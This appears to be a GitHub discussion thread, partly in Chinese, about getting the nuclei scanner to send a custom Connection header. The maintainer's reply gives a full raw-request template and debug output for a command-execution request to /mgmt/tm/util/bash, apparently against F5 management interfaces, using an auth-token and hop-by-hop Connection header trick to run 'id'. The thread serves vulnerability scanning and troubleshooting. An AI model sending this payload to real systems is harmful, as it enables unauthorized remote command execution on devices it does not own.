ProjectDiscovery
-
使用nuclei进行验证后,发现connection字段无法定义,源码中好像是默认关闭了keep-alive,使用了unsafe:true,仍然返回的是connection:close. |
Beta Was this translation helpful? Give feedback.
Replies: 3 comments
-
|
@Henry4E36 below template works as expected; what's the issue? id: test
info:
name: test test
author: test
severity: info
requests:
- raw:
- |
POST /mgmt/tm/util/bash HTTP/1.1
Host: {{Hostname}}
X-F5-Auth-Token: a
Connection: keep-alive, x-F5-Auth-Token
Authorization: Basic YWRtaW46
Content-Type: application/json
{"command": "run", "utilCmdArgs": "-c id"}echo http://0.0.0.0:8000 | nuclei -t test.yaml -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ 2.7.0
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.0 (latest)
[INF] Using Nuclei Templates 9.0.0 (latest)
[INF] Templates added in last update: 5
[INF] Templates loaded for scan: 1
[INF] [payload-test] Dumped HTTP request for http://0.0.0.0:8000
POST /mgmt/tm/util/bash HTTP/1.1
Host: 0.0.0.0:8000
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Content-Length: 44
Authorization: Basic YWRtaW46
Connection: keep-alive, x-F5-Auth-Token
Content-Type: application/json
X-F5-Auth-Token: a
Accept-Encoding: gzip
{"command": "run", "utilCmdArgs": "-c id"} |
Beta Was this translation helpful? Give feedback.
-
|
您好,感谢您的解答,我尝试使用您的debug去允许,诚如您允许的一样,“Connection: keep-alive, x-F5-Auth-Token”被定义了,当我进行-p进行burp代理调试发现,burp的数据包中并没有定义“Connection: keep-alive, x-F5-Auth-Token“,脚本依然检测不出漏洞,该IP用python脚本验证过存在漏洞。 当·我在burp的数据包中添加上Connection: keep-alive, x-F5-Auth-Token字段时,他是可以执行命令的 |
Beta Was this translation helpful? Give feedback.
-
|
不好意思给您添麻烦了,是burp的问题 |
Beta Was this translation helpful? Give feedback.
@Henry4E36 below template works as expected; what's the issue?